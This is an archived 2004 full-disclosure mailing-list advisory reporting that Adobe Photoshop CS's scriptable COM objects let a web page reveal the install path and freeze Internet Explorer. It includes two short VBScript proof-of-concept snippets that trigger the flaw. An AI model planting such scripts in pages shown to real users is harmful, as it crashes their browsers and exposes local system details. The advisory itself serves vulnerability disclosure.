[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000301c41bf6$c6bff470$a85ab350@fucku>
Date: Tue, 6 Apr 2004 18:46:58 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "securitytracker" <bugs@...uritytracker.com>,
"SecurITeam News" <news@...uriteam.com>,
"full-disclosure" <full-disclosure@...ts.netsys.com>,
"bugtraq" <bugtraq@...urityfocus.com>
Subject: Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E D.O.S
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Adobe Photoshop
Vendors: http://www.adobe.com
Version: 8.0 (CS)
Platforms: Windows
Bug: Local Path Disclosure and D.O.S
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Adobe Photoshop is one of the worlds best graphic editors.
It has a great set of tools, layer combinations, brushes, amazing software.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Adobe Photoshop registers a lot of COM objects(such as
"Photoshop.Application.8"
and "Photoshop.PhotoCDOpenOptions.8"). These objects are marked as "safe"
for scripting. Therefore they can be created remotely(which is the root of
the problem - they should not!).
Unfortunatly , adobe did not design their object correctly, because upon any
remote
creation of a Photoshop Object a message pops up saying adobe photoshop
security
caught "potential tampering with photoshop", however it also reveals the
local path
of which photoshop was installed in and the Internet Explorer window stops
responding(D.O.S).
For Example:
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>
Will show where photoshop is installed and that
Internet Explorer window stops responding(D.O.S).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8" )
</script>
------------------- CUT HERE -------------------
Or
------------------- CUT HERE -------------------
<script language=vbscript>
dim cooler
Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" )
</script>
------------------- CUT HERE -------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists